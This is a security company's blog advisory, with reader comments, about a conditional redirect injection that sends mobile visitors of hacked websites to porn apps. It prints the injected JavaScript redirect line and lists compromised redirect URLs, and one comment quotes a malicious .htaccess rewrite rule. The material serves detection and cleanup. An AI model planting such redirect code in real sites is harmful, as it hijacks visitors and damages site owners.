Website Malware – Mobile Redirect to BaDoink Porn App

A few weeks ago we reported that we were seeing a huge increase in the number of websites compromised with a hidden redirection to pornographic content. It was a very tricky injection, with the redirection happening only once per day per IP address and only if the visitor was using a mobile device (iPhone, Android and a few others).

These types of injections are called conditional redirects because certain conditions need to be met for them to redirect visitors. They are not always present and the malware authors try very hard to hide them from the website owner. The malware code looks for logged-in cookies to try to identify whether or not someone is managing the site and then attempts to never redirect someone who is logged in. Finally, if a visitor gets redirected once, the malware will not redirect them again. The goal for the malware author is for visitors to not report something going wrong with a website. In this example, if you were to visit an infected site, you’d be redirected, but from your point of view, maybe it was just something weird so you retype the URL and now you aren’t redirected. Since everything is working normally now, you decide not to report it and the malware lives on.

As you can imagine, this sort of malware can be difficult to troubleshoot. In fact, very often webmasters think it’s a typo and move on instead of investigating what happened. For that reason, most sites remain compromised, so if anyone ever complains that your site redirecting to Instabang.com or a Badoink Porn App, it is very likely your site is hacked.

Badoink-338x600

For more details on our previous analysis, you can visit our previous post, about malicious redirects to porn websites on mobile devices

Technical Analysis – New Range of Injections

Initially, this injection was happening through hidden forms that were automatically submitted via JavaScript upon page load. This last version of the malware has been modified. Now, it’s using JavaScript to force a redirect to a secondary landing page. This is the JavaScript code:

<script>top.location.replace("httx://www.1strateannuities.com/199c99c6d718c7b222eaa1a5fabd2467.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102″);

As you can see, it uses “top.location.replace” to send the user to another compromised domain (in the case above 1strateannuities.com), where it then sends the user to hxxp://ads.mobiteasy.com/mr/?id=SRV0102.

Once there, it decides where to redirect the user, which is often to either the BaDoink porn app or to Instabang. Just in the last few days, these were the sites misused as the initial redirection vector:

http://www.1strateannuities.com/199c99c6d718c7b222eaa1a5fabd2467.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102");
http://www.1strateannuities.com/199c99c6d718c7b222eaa1a5fabd2467.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://www.2013foundations.com/22ab9c9bdeae7b074719eca789ea3397.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://medicalhospitalitygroup.com/28d8e465d7d573b25255f5d56750faef.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://www.10dayssold.com/3615ccfb9d6365cf44b9b34a941ccaf4.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://www.10k-cash.com/3f7c4df28646c8fd08285cfbd8ba3cee.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://sifamuk.com/f3d61b9cc0e63a87dccf63754bdd2dd6.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://www.10dayweightlosschallenge.com/276f2bb01190a423ec7b9ca7d8e9fad0.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://robbiehoucek.com/83b028352b34c11fb2cddff566c9fd8a.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://urbanincubation.com/d275d964cd71fc4c8f0963450b6958a0.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102http://testx2.vladogeorgiev.com/7a9ca9045edbb37f0eaa13cd3f6071d0.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://knoxvillewaterfirerestoration.com/3cef451625a50c08bff223372895dd33.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://sorianoproperties.com/22ffc02b577e6d1fa21813e208417d14.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://riverstonefitness.com/ca785b5cbf87edf65e02423cb2d36e67.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://sportsbettorz.com/4c9269300f2a7ed6c8e7a1db7f7cae09.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://roofingservicesct.com/489219955adc40fc371fc60d230cc583.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://pinkyoda.com/f8c07d6deddf8d43360860efa140da44.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
http://quemooono.com/8c6d28f83c82058736543b0cb6905045.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102
Removing the Porn Redirect

Shameless Plug: If you have used SiteCheck and notice the issue I mentioned above – showing dirty, then clean, or not showing at all – have no fear, this does happen from time to time. It’s how the scanner works. Rest assured though, our team is able to address the issue and our internal scanners will catch the issue outright once configured.

If you’re not sure if you’ve been hacked, we’d recommend asking a couple of friends to visit your URL, if they aren’t affiliated with your site and haven’t visited it in a while. As well, make sure you understand the symptoms of malware. In this case, if something feels off, then something is probably wrong and your site could be at risk. If that’s the case, our team can help.

To address the issue yourself, make sure to investigate in these locations:

  • /index.php
  • /wp-config.php (if using WordPRess)
  • /configuration.php (if using Joomla)
  • /wp-content/themes/yourtheme/functions.php (if using WordPress)

These are the 4 places where we see this injection being added. Note that it is highly encoded, and that you will have to look for any line that looks out of place. In most cases, it’s probably best to engage your developer for help.

Remember, the issue at the surface – the infection – is only the tip of the iceberg. If your website is infected you have to assume that the attackers have penetrated your defenses and have added controls that will allow them to continue to penetrate your environment so be sure to look for backdoors.

If you’re sick of reading about new malware incursions every single week, just know that there is money for the bad guys in malware of all kinds. You can protect your site from hard to detect problems, like conditional redirects, without ever having to worry that you’ve been attacked by adding firewall protection, like our own CloudProxy Firewall.

If you have any questions about this redirect or anything else, let us know. You can also engage us on Twitter at Sucuri Security or Sucuri Labs.

About Daniel Cid

Daniel B. Cid is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

  • http://watwebdev.com/ WatWebDev.com

    It seems as if those files are randomly generated names so they can not easily be traced. Unlike using an actual name for the file. This helps to hide the infection better.
    Also, I cant help but notice that it seems to be redirecting to ads with what I assume is an affiliate or reference number at the end.

    Have you contacted the guys at mobiteasy.com? Surely if they know that there is illegal activity by one of their publishers / affiliates / whatever, then they could ban that person as well as their IP address etc.

    The infection may be well hidden, but if they lose their affiliate ID and mobiteasy.com do something very kind such as sending every single visitor who goes to http://ads.mobiteasy.com/mr/?id=SRV0102 back to the referring link or to a landing page. This way the attacker has lost their income which is the only reason they made the attack in the first place. Hit em where it hurts most.

    While they likely have some access to be able to alter the scripts for their new link or affiliate id, it will cost them more time. I would imagine that they have built up a huge network of sites sending many people to these advertising links and making them a lot of money. If they were to lose the link, they have to start all over again.

    The biggest issue by far that almost all wordpress admins already have is that they allow (without even knowing it) php and even shebang ( http://en.wikipedia.org/wiki/Shebang_%28Unix%29 ) by default. This really boggles my mind. How many customers on a jam packed server such as godaddy or hostgator actually need to upload php and shebang containing files? Yet they keep it active and thus we see all of these infections. They should disable it as it can be enabled using php.ini if you really need it.

  • Matthew Boyle

    My name is Matthew and I work for BaDoink.

    Thanks for this post; It is very informative and highlights the problems that we deal with on regular basis.

    BaDoink, like many other companies often get traffic from sources such as affiliates and ad networks. Sometimes a small percentage of this traffic comes from bad sources.

    We want to make it clear that we do not tolerate or condone any of this traffic being generated in this manner because it hurts us more than it helps us. The moment we identify these sort of issues we aim to terminate the source and also terminate an affiliate if one was involved.

    If anyone has any further information for this issue or any others then please contact me; Matthew @ BaDoink (.) com

    • Hagar Kelly

      a good and responsible reply :)

    • Glynn Huggins

      It’s a shame your email does not work.
      Is this a real person or just an attempt to defend the indefensible?

      • Matthew Boyle

        Hi Glynn,
        Sorry it didnt work for you and yes, I am a real person :

        Try copying and pasting exactly matthew@badoink.com

        Thanks and looking forward to helping you.

        Matthew

        • Glynn Huggins

          When I tried to email you, I got this message:

          This message was created automatically by mail delivery software.

          A message that you sent could not be delivered to one or more of
          its recipients. This is a permanent error. The following address
          failed:

          “matthew@badoink.com”:

          I am no expert but it looks like there is a block on contacting you.

  • Darkmatter

    My sites are infected with this redirect and I’ve searched for “top.location.replace” in all of my installs and nothing found. What should I be searching (through shell) for to find the culprit file(s) causing this?

  • Anonymous

    “>

    • Anonymous

      tset

  • tester

    test

  • test

    awerawer

  • Leo

    Hello,

    My name is Leo and i work for Mobiteasy.We are Mobile ad Network.

    Firstly, i would like to say that we got this news only today.
    We also ,as a Badoink, get traffic from sources such as affiliates and ad networks. We have tons of sites from affiliates.
    So we can’t check every site who’s sending us traffic ,but we always ready to be in cooperation with partners and terminate an affiliate as well.
    This affiliate was immediately banned. Now we keep in contact with Badoink representatives.

    We have been working with Badoink for a long time and also with a lot of partners, for us it’s more important to save our reputation.
    However , how can we be saved from this kind of traffic? If somebody send us bad traffic , we can just terminate affiliate.

    We value our reputation.

    If anyone has any further information for this issue or any others then please contact me support@mobiteasy.com

    Thanks

  • DavidEssex

    Hilarious!

  • Phil Looby

    I was having this problem too. My WordPress site was redirecting on for iPad/iPhone to some inappropriate sites.

    I checked my .htaccess file and it had clearly been hacked.
    I found the following line and deleted it

    RewriteRule ^(.*)$ http://modrewrite(.)ru [L,R=302]

    Once I removed this and uploaded it my site stopped redirecting to random porn sites
    I hope this helps

  • BusinessFocusGroup

    This problem seems to be getting more sophisticated. Have several sites
    on the same hosting company that are infected. The domains are
    registered with different registrars. I looked through each of the four
    files listed above and didn’t find anything changed compared to the
    previous backup before the infection. In the meanwhile, to be safe, have
    changed the sites nameservers on the registrar to prevent users from
    being redirected to the porn sites. However, the sites still redirect
    despite the change even after clearing the browser cookies and cache on
    my phone. This makes me wonder if the issue is at the server level on
    the host or the redirect at the registrar?… Well it turns out that it puts a cookie in your phone that is difficult to remove and everytime the same mobile device attempts to access URLs that were previously infected will be redirected automatically. The few URLs that had not been accessed on my mobile device, but were infected and had their nameserver changed show the registrars parked page and do not redirect to the porn site. BaDoink and Mobiteasy may try to act like they are responsible, but that is like a crack producer saying they tell all their “dealers” to be honest, ethical, and moral. Guess the only satisfaction I get (besides filing the usual complaints with FBI) is in all the times we had to hit their sites to do testing knowing they had to pay their rogue affiliate yet not get a penny in sign-ups. If anyone knows how we can put something back on the sanitized site to clean the infected mobile browsers, let us know. Thanks for all the previous posts and help!

Share This